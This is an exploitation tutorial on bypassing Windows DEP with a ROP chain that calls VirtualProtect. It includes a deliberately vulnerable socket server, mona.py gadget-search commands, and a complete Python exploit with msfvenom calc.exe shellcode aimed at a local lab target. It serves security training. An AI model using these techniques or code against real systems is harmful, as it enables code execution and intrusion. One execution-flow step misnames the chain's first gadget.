Tutorial

Bypassing DEP with ROP on Windows

Build a ROP chain on Windows to bypass Data Execution Prevention, using mona.py to find gadgets and VirtualProtect to mark shellcode executable.

5 min read advanced

Prerequisites

  • Completion of the Windows Stack Buffer Overflow tutorial
  • Understanding of ROP concepts (see the Linux ROP tutorials)
  • Familiarity with Immunity Debugger and mona.py
  • Basic knowledge of Windows API calling conventions

Part 4 of 7 in Windows Exploitation

The first three tutorials in this series exploited binaries where the stack was executable. That era is over. Virtually every modern Windows binary is built with DEP (Data Execution Prevention) enabled, which marks the stack and heap as non-executable. Shellcode placed on the stack triggers an access violation instead of running.

The bypass is the same idea as on Linux: return-oriented programming. Instead of executing injected code, you chain together short instruction sequences (“gadgets”) that already exist in executable memory, typically in loaded DLLs, to call a Windows API function that makes your shellcode’s memory region executable. Then you jump to it.

On Windows, the two most common targets are VirtualProtect (change page permissions on existing memory) and VirtualAlloc (allocate a new executable region and copy shellcode into it). This tutorial uses VirtualProtect because the shellcode is already on the stack; you just need to flip the page from PAGE_READWRITE to PAGE_EXECUTE_READWRITE.

Without DEP bypass:

  Stack:
  +--------+---------+------------+
  | Junk   | JMP ESP | Shellcode  |  → ACCESS VIOLATION (NX bit set)
  +--------+---------+------------+

With ROP chain:

  Stack:
  +--------+-----------------------------+------------+
  | Junk   | ROP chain → VirtualProtect  | Shellcode  |  → VirtualProtect makes
  +--------+-----------------------------+------------+    stack executable, then
                                                           shellcode runs

Lab setup

Use the same Windows environment from previous tutorials:

  • Windows 11 (the target is a 32-bit process running under WoW64; Windows 11 has no 32-bit edition)
  • Immunity Debugger with mona.py installed
  • A vulnerable application compiled with DEP enabled and ASLR disabled

For a controlled target, compile a simple vulnerable server with DEP on and ASLR off:

// vuln_dep.c — compile with: cl /GS- vuln_dep.c /link /NXCOMPAT /DYNAMICBASE:NO ws2_32.lib
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")

void handle_client(SOCKET client) {
    char buf[512];
    int len = recv(client, buf, 2048, 0);  // overflow: 2048 into 512
    printf("Received %d bytes\n", len);
}

int main() {
    WSADATA wsa;
    WSAStartup(MAKEWORD(2, 2), &wsa);

    SOCKET s = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in addr = {0};
    addr.sin_family = AF_INET;
    addr.sin_port = htons(9999);
    addr.sin_addr.s_addr = INADDR_ANY;

    bind(s, (struct sockaddr *)&addr, sizeof(addr));
    listen(s, 5);
    printf("Listening on port 9999...\n");

    while (1) {
        SOCKET client = accept(s, NULL, NULL);
        handle_client(client);
        closesocket(client);
    }
}

The /NXCOMPAT flag enables DEP. /DYNAMICBASE:NO disables ASLR so we can focus on the DEP bypass without address randomization (that’s the next tutorial).

Note

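If you don’t have Visual Studio, use MinGW: gcc -o vuln_dep.exe vuln_dep.c -lws2_32 -Wl,--nxcompat,--disable-dynamicbase. The --disable-dynamicbase option needs binutils 2.36 or later; older versions leave ASLR off by default, so drop that option there. Verify DEP is enabled by checking the PE header with dumpbin /headers vuln_dep.exe (look for "NX compatible" under DLL characteristics) or by inspecting the module in Immunity.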
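If dumpbin is not at hand, the same header field can be read with a few lines of Python. This is a minimal sketch that assumes a well-formed PE file; the function names are illustrative and not part of any tool mentioned here. The flag values and field offset come from the PE/COFF format.

```python
import struct

# DllCharacteristics flag values from the PE/COFF specification.
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # ASLR opt-in
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100     # DEP opt-in


def dll_characteristics(data: bytes) -> int:
    """Return the DllCharacteristics word from raw PE file bytes."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    # e_lfanew (offset 0x3C) holds the file offset of the "PE\0\0" signature.
    (pe_offset,) = struct.unpack_from("<I", data, 0x3C)
    if data[pe_offset:pe_offset + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    # The optional header follows the 4-byte signature and 20-byte COFF header.
    # DllCharacteristics sits at offset 70 in both PE32 and PE32+.
    (flags,) = struct.unpack_from("<H", data, pe_offset + 24 + 70)
    return flags


def mitigation_flags(data: bytes) -> dict:
    """Report whether the image opts in to DEP and ASLR."""
    flags = dll_characteristics(data)
    return {
        "nx_compat": bool(flags & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "dynamic_base": bool(flags & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
    }
```

For the lab target, mitigation_flags(open("vuln_dep.exe", "rb").read()) should report nx_compat as True and dynamic_base as False if the build flags took effect.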

Confirming DEP is active

Attach Immunity Debugger to the running process. Before building the exploit, verify DEP status:

!mona modules

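Look at the NXCompat column in the output; True means the module is DEP-compatible. You can also check at the process level in Task Manager:

Details tab → right-click a column header → Select columns → "Data Execution Prevention"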

Send an initial overflow to confirm the crash:

#!/usr/bin/env python3
import socket

payload = b"A" * 524 + b"BBBB" + b"\xcc" * 200  # INT3 sled after EIP

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 9999))
s.sendall(payload)
s.close()

In Immunity, you’ll see EIP overwritten with 42424242. If you then replace BBBB with a JMP ESP address and place shellcode after it, execution stops with a DEP violation:

Access violation when executing [0019FA6C] — NX page fault

DEP is working. The stack is not executable.

Understanding VirtualProtect

VirtualProtect is the Windows API function that changes memory page permissions. Its signature:

BOOL VirtualProtect(
    LPVOID lpAddress,       // Address of the region to change
    SIZE_T dwSize,          // Size of the region in bytes
    DWORD  flNewProtect,    // New protection flags (0x40 = PAGE_EXECUTE_READWRITE)
    PDWORD lpflOldProtect   // Pointer to receive the old protection value
);

To bypass DEP, the ROP chain needs to:

  1. Set up the four arguments to VirtualProtect on the stack or in registers
  2. Call VirtualProtect with lpAddress pointing to the shellcode, dwSize large enough to cover it, and flNewProtect = 0x40
  3. After VirtualProtect returns, redirect execution to the now-executable shellcode

The lpflOldProtect parameter requires a writable address; any writable location in the process works (a global variable, a .data section address). VirtualProtect writes the old protection value there.

ROP chain layout on the stack:

  ESP →  +---------------------------+
         | VirtualProtect address    |  ← function to call
         +---------------------------+
         | Return address (→shellcode)|  ← where to go after VP returns
         +---------------------------+
         | lpAddress (ESP / shellcode)|  ← arg 1: memory to make executable
         +---------------------------+
         | dwSize (0x400)            |  ← arg 2: size
         +---------------------------+
         | flNewProtect (0x40)       |  ← arg 3: PAGE_EXECUTE_READWRITE
         +---------------------------+
         | lpflOldProtect (writable) |  ← arg 4: any writable address
         +---------------------------+
         | NOP sled + Shellcode      |
         +---------------------------+
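The layout above can be written out as bytes to make the stdcall frame concrete. This is a sketch for illustration, not a usable payload: every address passed in is a hypothetical placeholder, and a literal frame like this contains null bytes (in 0x40 and 0x400, for instance), which is why a real chain usually builds the values in registers instead.

```python
import struct

PAGE_EXECUTE_READWRITE = 0x40


def virtualprotect_frame(vp_addr, return_to, lp_address, size, old_protect_ptr):
    """Pack the six dwords from the diagram, top of stack first."""
    return struct.pack(
        "<6I",
        vp_addr,                 # popped into EIP by the preceding RETN
        return_to,               # where VirtualProtect returns (the shellcode)
        lp_address,              # arg 1: lpAddress
        size,                    # arg 2: dwSize
        PAGE_EXECUTE_READWRITE,  # arg 3: flNewProtect
        old_protect_ptr,         # arg 4: lpflOldProtect (must be writable)
    )


# Placeholder values for illustration only; none of these are real addresses.
frame = virtualprotect_frame(0x11111111, 0x0019FA6C, 0x0019FA6C, 0x400, 0x22222222)
```

The frame is 24 bytes long, and b"\x00" in frame is True, which shows the bad-character problem the next sections work around.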

Finding gadgets with mona

Configure mona’s working directory:

!mona config -set workingfolder C:\mona\%p

Locating VirtualProtect

!mona iat -s VirtualProtect

This searches the Import Address Table for VirtualProtect. The output shows the address of the IAT entry, which contains a pointer to the actual function.

0x12345678  kernel32.VirtualProtect  (Module: vuln_dep.exe)

Finding a non-ASLR module for gadgets

!mona modules

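Look for modules with ASLR disabled (False in the ASLR column) whose addresses contain no bad characters. The vulnerable executable itself and any DLLs it loads without ASLR are candidates, but every address in vuln_dep.exe (base 0x00400000) starts with a null byte, so with \x00 as a bad character the usable gadgets will come from MSVCRT.dll.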

Module        Base       ASLR    DEP    SafeSEH
vuln_dep.exe  0x00400000 False   True   False
MSVCRT.dll    0x77C10000 False   True   False
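A quick way to see why a module qualifies or not is to check candidate gadget addresses against the bad-character list. The helper below is a sketch with hypothetical names; it assumes 32-bit little-endian addresses and the \x00, \x0a, \x0d set used later in this tutorial.

```python
BAD_CHARS = b"\x00\x0a\x0d"


def bad_bytes_in(address: int, bad_chars: bytes = BAD_CHARS) -> list:
    """Return the bad bytes found in the little-endian encoding of an address."""
    encoded = address.to_bytes(4, "little")
    return [b for b in encoded if b in bad_chars]


def is_usable(address: int, bad_chars: bytes = BAD_CHARS) -> bool:
    """True if the address can be sent without hitting a bad character."""
    return not bad_bytes_in(address, bad_chars)
```

Any address inside vuln_dep.exe, such as 0x00401000, fails the check because of its leading null byte, while an address like 0x77c31e24 in MSVCRT.dll passes.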

Generating the ROP chain

Mona can automatically generate a ROP chain for common DEP bypasses:

!mona rop -m vuln_dep.exe,MSVCRT.dll -cpb "\x00\x0a\x0d"

This searches the specified modules for gadgets and attempts to construct a complete chain. The -cpb flag excludes pointers that contain bad characters. Mona writes the assembled chains to rop_chains.txt and the full gadget list to rop.txt.

!mona rop -m vuln_dep.exe,MSVCRT.dll -cpb "\x00\x0a\x0d" -n

The -n flag skips modules with null bytes in their base address.

Review C:\mona\vuln_dep\rop_chains.txt. Mona produces Python-ready output:

# mona.py ROP chain for VirtualProtect (example output)
# POP_EBP_RETN and JMP_ESP are placeholders, not real addresses. Use the
# POP EBP # RETN gadget and the JMP ESP (or PUSH ESP # RETN) pointer that
# mona reports for your own modules.
POP_EBP_RETN = 0x41414141
JMP_ESP = 0x42424242

def create_rop_chain():
    rop_gadgets = [
        # rop chain generated by mona.py
        POP_EBP_RETN,  # POP EBP # RETN
        JMP_ESP,       # ptr to JMP ESP: return address for VirtualProtect
        0x77c31e24,  # POP EAX # RETN  [MSVCRT.dll]
        0x77c11120,  # ptr to &VirtualProtect() [IAT MSVCRT.dll]
        0x77c31e70,  # MOV EAX,DWORD PTR DS:[EAX] # RETN  [MSVCRT.dll]
        0x77c12df9,  # XCHG EAX,ESI # RETN  [MSVCRT.dll]
        0x77c31e24,  # POP EAX # RETN  [MSVCRT.dll]
        0xfffffdff,  # Value to negate, will become 0x00000201 (513 bytes)
        0x77c353c3,  # NEG EAX # RETN  [MSVCRT.dll]
        0x77c12df8,  # XCHG EAX,EBX # RETN  [MSVCRT.dll]  (EBX = dwSize)
        0x77c31e24,  # POP EAX # RETN  [MSVCRT.dll]
        0xffffffc0,  # Value to negate, becomes 0x00000040
        0x77c353c3,  # NEG EAX # RETN  (EAX = PAGE_EXECUTE_READWRITE)
        0x77c12e01,  # XCHG EAX,EDX # RETN  [MSVCRT.dll]  (EDX = flNewProtect)
        0x77c34a10,  # POP ECX # RETN  [MSVCRT.dll]
        0x77c5f030,  # &Writable location [MSVCRT.dll .data]  (lpflOldProtect)
        0x77c34a14,  # POP EDI # RETN  [MSVCRT.dll]
        0x77c353c4,  # RETN (ROP NOP)  [MSVCRT.dll]
        0x77c31e24,  # POP EAX # RETN  [MSVCRT.dll]
        0x90909090,  # NOP
        0x77c12e08,  # PUSHAD # RETN  [MSVCRT.dll]
        # PUSHAD pushes EAX, ECX, EDX, EBX, original ESP, EBP, ESI, EDI, so
        # EDI ends up on top. The RETN after PUSHAD runs the ROP NOP in EDI,
        # which returns into VirtualProtect (ESI) with EBP as its return
        # address and ESP, EBX, EDX, ECX as its four stdcall arguments.
    ]
    return b''.join(p.to_bytes(4, 'little') for p in rop_gadgets)

How the chain works

The chain uses an indirect approach because placing the arguments on the stack directly would require null bytes (0x00000040, for example), which would break the exploit. Instead, it builds each value in a register:

  1. Set the return address: EBP must hold the address of a JMP ESP (or PUSH ESP # RETN) gadget, loaded with a POP EBP # RETN. VirtualProtect returns there
  2. Load the VirtualProtect address: POP the IAT pointer into EAX, dereference it to get the actual function address, move it into ESI
  3. Set dwSize: POP a negative value into EAX, negate it (avoids null bytes), move it to EBX
  4. Set flNewProtect: same trick. POP the negative of 0x40, negate, move to EDX
  5. Set lpflOldProtect: POP a writable .data address into ECX
  6. Load EDI and EAX: EDI gets a bare RETN (ROP NOP) and EAX gets 0x90909090
  7. PUSHAD: push all registers in the order EAX, ECX, EDX, EBX, ESP (the value before PUSHAD, which becomes lpAddress), EBP, ESI, EDI. This constructs the VirtualProtect call frame automatically

The PUSHAD trick is elegant: by loading specific values into specific registers and then pushing them all at once, the stack ends up with VirtualProtect’s arguments in exactly the right positions for the stdcall calling convention.

After PUSHAD, the stack looks like:

  ESP →  +---------------------------+
         | EDI = RETN gadget         |  ← runs first (ROP NOP), returns into ESI
         +---------------------------+
         | ESI = &VirtualProtect     |  ← called via RETN
         +---------------------------+
         | EBP = JMP ESP gadget      |  ← VirtualProtect returns here
         +---------------------------+
         | ESP = stack addr          |  ← lpAddress (points just past the EAX slot)
         +---------------------------+
         | EBX = 0x201               |  ← dwSize
         +---------------------------+
         | EDX = 0x40                |  ← flNewProtect
         +---------------------------+
         | ECX = writable addr       |  ← lpflOldProtect
         +---------------------------+
         | EAX = 0x90909090          |  ← JMP ESP lands here (start of NOP sled)
         +---------------------------+
         | Shellcode continues...    |
         +---------------------------+
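The register-to-slot mapping is easy to get backwards, so it can help to model it. The sketch below reproduces the PUSHAD push order and labels each slot by the role it plays once the RETN after PUSHAD executes. The role names are made up for this example, and the ESP, EBP and ESI values are placeholders.

```python
# Order in which PUSHAD pushes the registers (the first pushed ends up deepest).
PUSHAD_ORDER = ["EAX", "ECX", "EDX", "EBX", "ESP", "EBP", "ESI", "EDI"]

# Role of each slot, top of stack first, for a VirtualProtect call frame.
ROLES = ["rop_nop", "function", "return_to", "lpAddress",
         "dwSize", "flNewProtect", "lpflOldProtect", "first_dword_executed"]


def pushad_stack(regs: dict) -> list:
    """Return (register, value) pairs as they sit on the stack, top first."""
    return [(name, regs[name]) for name in reversed(PUSHAD_ORDER)]


def describe(regs: dict) -> dict:
    """Map each role to the value PUSHAD places in that slot."""
    return {role: value for role, (_, value) in zip(ROLES, pushad_stack(regs))}


regs = {
    "EAX": 0x90909090,  # NOPs executed right after VirtualProtect returns
    "ECX": 0x77C5F030,  # writable address from the example chain
    "EDX": 0x40,        # PAGE_EXECUTE_READWRITE
    "EBX": 0x201,       # dwSize
    "ESP": 0x0019FA6C,  # placeholder: ESP as it was before PUSHAD ran
    "EBP": 0x42424242,  # placeholder: JMP ESP gadget
    "ESI": 0xAAAAAAAA,  # placeholder: resolved VirtualProtect address
    "EDI": 0x77C353C4,  # RETN gadget from the example chain
}
layout = describe(regs)
```

Here layout["return_to"] is the EBP value and layout["lpAddress"] is the saved ESP, which is the point to check first when VirtualProtect succeeds but execution never reaches the shellcode.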

Identifying bad characters

Follow the same process from previous tutorials:

!mona bytearray -b "\x00"
!mona compare -f C:\mona\vuln_dep\bytearray.bin -a <address>

For a network service, typical bad characters include:

\x00  — null byte (string terminator)
\x0a  — newline (protocol parsing)
\x0d  — carriage return (protocol parsing)

The negation trick in the ROP chain avoids null bytes in arguments like 0x00000040 (flNewProtect): instead of placing that value in the payload, we POP 0xffffffc0 and negate it.
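The operand to POP for any target value is just its 32-bit two’s-complement negation. The helper below is a small sketch (function names are illustrative) that computes it and rejects results that still contain a bad character, assuming the \x00, \x0a, \x0d set listed above.

```python
BAD_CHARS = b"\x00\x0a\x0d"


def neg32(value: int) -> int:
    """Two's-complement negation of a 32-bit value, as NEG EAX computes it."""
    return (-value) & 0xFFFFFFFF


def negated_operand(target: int, bad_chars: bytes = BAD_CHARS) -> int:
    """Return the dword to POP so that NEG yields `target`."""
    operand = neg32(target)
    if any(b in bad_chars for b in operand.to_bytes(4, "little")):
        raise ValueError(f"0x{operand:08x} still contains a bad character")
    return operand
```

negated_operand(0x40) gives 0xffffffc0 and negated_operand(0x201) gives 0xfffffdff, matching the chain. A target such as 0x100 raises an error because its negation, 0xffffff00, still ends in a null byte; that is why the chain uses 0x201 rather than a round size.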

Complete exploit

Generate a real payload first and save it next to the exploit as shellcode.py:

msfvenom -p windows/exec cmd=calc.exe -b "\x00\x0a\x0d" -f python -v shellcode > shellcode.py

Then build and send the payload:

#!/usr/bin/env python3
import socket
import struct
from shellcode import shellcode

pack = lambda x: struct.pack('<I', x)

# Bad chars: \x00\x0a\x0d

offset = 524  # bytes to EIP

# ROP chain: VirtualProtect via PUSHAD technique
# Addresses from mona output (adjust for your environment)
# POP_EBP_RETN and JMP_ESP are placeholders, not real addresses: take the
# POP EBP # RETN gadget from rop.txt and a JMP ESP pointer from !mona jmp -r esp
POP_EBP_RETN = 0x41414141
JMP_ESP = 0x42424242

rop_chain = b""
rop_chain += pack(POP_EBP_RETN)  # POP EBP # RETN
rop_chain += pack(JMP_ESP)     # EBP = JMP ESP; VirtualProtect returns here
rop_chain += pack(0x77c31e24)  # POP EAX # RETN
rop_chain += pack(0x77c11120)  # ptr to &VirtualProtect() [IAT]
rop_chain += pack(0x77c31e70)  # MOV EAX,[EAX] # RETN (dereference IAT)
rop_chain += pack(0x77c12df9)  # XCHG EAX,ESI # RETN (ESI = VirtualProtect)
rop_chain += pack(0x77c31e24)  # POP EAX # RETN
rop_chain += pack(0xfffffdff)  # -0x201 (will be negated to 0x201 = 513 bytes)
rop_chain += pack(0x77c353c3)  # NEG EAX # RETN (EAX = 0x201)
rop_chain += pack(0x77c12df8)  # XCHG EAX,EBX # RETN (EBX = dwSize)
rop_chain += pack(0x77c31e24)  # POP EAX # RETN
rop_chain += pack(0xffffffc0)  # -0x40 (will be negated to 0x40)
rop_chain += pack(0x77c353c3)  # NEG EAX # RETN (EAX = 0x40)
rop_chain += pack(0x77c12e01)  # XCHG EAX,EDX # RETN (EDX = flNewProtect)
rop_chain += pack(0x77c34a10)  # POP ECX # RETN
rop_chain += pack(0x77c5f030)  # writable .data address (lpflOldProtect)
rop_chain += pack(0x77c34a14)  # POP EDI # RETN
rop_chain += pack(0x77c353c4)  # RETN (ROP NOP), runs first after PUSHAD
rop_chain += pack(0x77c31e24)  # POP EAX # RETN
rop_chain += pack(0x90909090)  # NOPs, executed right after VirtualProtect returns
rop_chain += pack(0x77c12e08)  # PUSHAD # RETN (sets up VirtualProtect call frame)

# NOP sled + shellcode
nop_sled = b"\x90" * 16

payload = b"A" * offset
payload += rop_chain
payload += nop_sled
payload += shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 9999))
s.sendall(payload)
s.close()

Execution flow

1. Overflow buf[512] with 2048 bytes via recv()

2. EIP overwritten with first gadget address (POP EAX # RETN)

3. ROP chain executes:
   a. Load a JMP ESP gadget address → EBP (VirtualProtect's return address)
   b. Load VirtualProtect address from IAT → ESI
   c. Set dwSize = 0x201 → EBX (via negate trick)
   d. Set flNewProtect = 0x40 → EDX (via negate trick)
   e. Set lpflOldProtect = writable .data addr → ECX
   f. Set EDI = RETN gadget, EAX = 0x90909090 (NOPs for shellcode area)
   g. PUSHAD constructs the call frame

4. RETN after PUSHAD → RETN gadget (EDI) → VirtualProtect (ESI) executes
   - Changes stack page from RW to RWX

5. VirtualProtect returns to the JMP ESP gadget (EBP)
   - ESP now points at the 0x90909090 dword, so JMP ESP lands in the NOP sled on the (now executable) stack

6. Shellcode executes

Debugging the ROP chain

When the chain doesn’t work on the first try (it usually doesn’t), systematic debugging in Immunity is essential.

Setting breakpoints on gadgets

Set a breakpoint on the first gadget in your chain:

bp 0x77c31e24

Run the exploit. When it breaks, step through with F7 (step into) and verify each gadget does what you expect.

Watching register state

After each gadget executes, check that the target register holds the expected value. In the Registers window:

After POP EAX # RETN:    EAX should contain the IAT pointer
After MOV EAX,[EAX]:     EAX should contain &VirtualProtect
After XCHG EAX,ESI:      ESI should contain &VirtualProtect
...
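To know what each register should hold before opening the debugger, the register-loading part of the chain can be traced offline. The sketch below is a toy model under stated assumptions: it understands only the gadget types used in this tutorial, the GADGETS table is transcribed from the example chain rather than disassembled from MSVCRT.dll, and the value stored at the IAT slot is a made-up placeholder.

```python
# Semantics of each gadget address, transcribed from the example chain.
GADGETS = {
    0x77C31E24: ("pop", "EAX"),
    0x77C31E70: ("deref", "EAX"),         # MOV EAX,[EAX]
    0x77C12DF9: ("xchg", "EAX", "ESI"),
    0x77C12DF8: ("xchg", "EAX", "EBX"),
    0x77C12E01: ("xchg", "EAX", "EDX"),
    0x77C353C3: ("neg", "EAX"),
    0x77C34A10: ("pop", "ECX"),
    0x77C34A14: ("pop", "EDI"),
}


def trace(chain, memory):
    """Walk the chain and return the register state after each gadget."""
    regs = dict.fromkeys(["EAX", "EBX", "ECX", "EDX", "ESI", "EDI"], 0)
    states, i = [], 0
    while i < len(chain) and chain[i] in GADGETS:
        op, *args = GADGETS[chain[i]]
        i += 1
        if op == "pop":        # POP consumes the next dword in the chain
            regs[args[0]] = chain[i]
            i += 1
        elif op == "deref":    # read the dword stored at the address in the register
            regs[args[0]] = memory[regs[args[0]]]
        elif op == "neg":
            regs[args[0]] = (-regs[args[0]]) & 0xFFFFFFFF
        elif op == "xchg":
            a, b = args
            regs[a], regs[b] = regs[b], regs[a]
        states.append(dict(regs))
    return states


chain = [
    0x77C31E24, 0x77C11120, 0x77C31E70, 0x77C12DF9,  # ESI = VirtualProtect
    0x77C31E24, 0xFFFFFDFF, 0x77C353C3, 0x77C12DF8,  # EBX = 0x201
    0x77C31E24, 0xFFFFFFC0, 0x77C353C3, 0x77C12E01,  # EDX = 0x40
    0x77C34A10, 0x77C5F030,                          # ECX = writable address
    0x77C34A14, 0x77C353C4,                          # EDI = ROP NOP
    0x77C31E24, 0x90909090,                          # EAX = NOPs
]
memory = {0x77C11120: 0xAAAAAAAA}  # placeholder for the resolved function address
states = trace(chain, memory)
final = states[-1]
```

Comparing states[n] with the Registers window after the n-th gadget shows quickly which gadget misbehaves. A mismatch usually means the real gadget has a side effect the table does not model.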

Common failures

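VirtualProtect returns 0 (failure). Check the arguments: lpAddress must fall inside committed memory (it does not need to be page-aligned, because the call applies to every page the range touches), dwSize must be > 0, and lpflOldProtect must point to a writable address. To find writable locations, search with the access level set to read/write: !mona find -type bin -s "\x00\x00\x00\x00" -x RW.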

Chain crashes mid-execution. A gadget has a side effect you didn’t account for. Check if any gadget clobbers a register that a later gadget depends on. Step through each gadget and note all register changes, not just the intended one.

Shellcode still triggers DEP. VirtualProtect was called with the wrong lpAddress. The ESP value captured by PUSHAD might not point to your shellcode. Adjust the NOP sled size or add a stack adjustment gadget before the shellcode.

VirtualAlloc alternative

If VirtualProtect isn’t available or practical, VirtualAlloc allocates a new executable memory region:

LPVOID VirtualAlloc(
    LPVOID lpAddress,      // NULL (let the system choose)
    SIZE_T dwSize,         // Size of region
    DWORD  flAllocationType, // 0x1000 (MEM_COMMIT)
    DWORD  flProtect       // 0x40 (PAGE_EXECUTE_READWRITE)
);

The chain is slightly more complex because you need to copy shellcode from the stack into the newly allocated region. The typical approach:

  1. Call VirtualAlloc to get an RWX region
  2. Use a memcpy gadget or a series of MOV [reg], reg gadgets to copy shellcode
  3. Jump to the allocated region

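Mona generates this variant too. A !mona rop run writes a VirtualAlloc chain to rop_chains.txt alongside the VirtualProtect one, so no extra flag is needed. Mona’s VirtualAlloc chain passes the stack address as lpAddress, which re-commits the existing pages as executable and avoids the copy step. The -rva flag only changes how pointers are printed (module base plus offset), which is convenient when a module may load at a different base:

!mona rop -m vuln_dep.exe,MSVCRT.dll -cpb "\x00\x0a\x0d" -rva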

WriteProcessMemory alternative

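A third option is WriteProcessMemory, which copies data into a region of the target process. It can write into the .text section of a loaded module, which is executable but normally read-only, because the function temporarily changes the page protection itself when the destination is not writable: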

BOOL WriteProcessMemory(
    HANDLE  hProcess,       // -1 (current process, pseudo-handle)
    LPVOID  lpBaseAddress,  // destination in executable memory
    LPCVOID lpBuffer,       // source (shellcode on stack)
    SIZE_T  nSize,          // size of shellcode
    SIZE_T  *lpNumberOfBytesWritten  // output parameter
);

This avoids changing page permissions entirely; you write shellcode over existing executable code.

Tips and troubleshooting

Gadget alignment

On Windows x86, the stdcall convention expects the callee to clean up the stack. If your ROP chain doesn’t account for this, the stack will be misaligned after the API call returns. The PUSHAD technique handles this automatically, but manual chains need careful stack management.

DEP opt-in vs opt-out

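The system-wide DEP policy has four settings. The two you will normally encounter are:

  • OptIn: protects Windows system binaries and programs that opt in, for example by linking with /NXCOMPAT (default on client Windows)
  • OptOut: protects all processes except those explicitly excluded (default on Server)

The other two, AlwaysOn and AlwaysOff, force DEP on or off for every process regardless of opt-in flags.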

Check the system policy: bcdedit /enum | findstr nx. For testing, set OptOut to ensure DEP is active for your target.

Permanent DEP via SetProcessDEPPolicy

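Some applications call SetProcessDEPPolicy(PROCESS_DEP_ENABLE | PROCESS_DEP_DISABLE_ATL_THUNK_EMULATION), which enables DEP permanently for the lifetime of the process. This blocks the older bypass of switching DEP off at runtime (for example by returning into SetProcessDEPPolicy or NtSetInformationProcess), but it does not stop VirtualProtect from changing page permissions, so the chain in this tutorial still applies. If VirtualProtect does fail in your target, check its arguments first, then try VirtualAlloc or WriteProcessMemory instead.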

ROP chain size

The ROP chain for VirtualProtect with the PUSHAD technique is typically 76-100 bytes. Add the NOP sled and shellcode (roughly 220 bytes for the encoded windows/exec payload used here; a reverse shell is larger), and you need about 400 bytes of controllable stack space after EIP. If space is limited, consider a two-stage approach: use a minimal ROP chain to call VirtualProtect on a larger buffer elsewhere in memory where you’ve placed the full shellcode (similar to the egghunter concept from the previous tutorial).
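The space estimate is simple arithmetic, and it is worth redoing whenever the chain or payload changes. The sketch below uses hypothetical helper names and takes the shellcode size as an input, since that varies with the payload and encoder.

```python
def payload_budget(gadget_dwords: int, nop_sled: int, shellcode_len: int) -> dict:
    """Bytes needed after the saved return address, broken down by part."""
    chain = gadget_dwords * 4  # each chain entry is one 32-bit dword
    return {
        "chain": chain,
        "sled": nop_sled,
        "shellcode": shellcode_len,
        "total": chain + nop_sled + shellcode_len,
    }


def fits(total: int, offset: int, recv_limit: int) -> bool:
    """True if the padding plus the payload fits in one recv() of recv_limit bytes."""
    return offset + total <= recv_limit


budget = payload_budget(gadget_dwords=19, nop_sled=16, shellcode_len=220)
```

With 19 dwords, a 16-byte sled and a 220-byte payload, the total is 312 bytes, and fits(budget["total"], 524, 2048) is True for the lab server’s 2048-byte recv(). Each extra gadget adds 4 bytes.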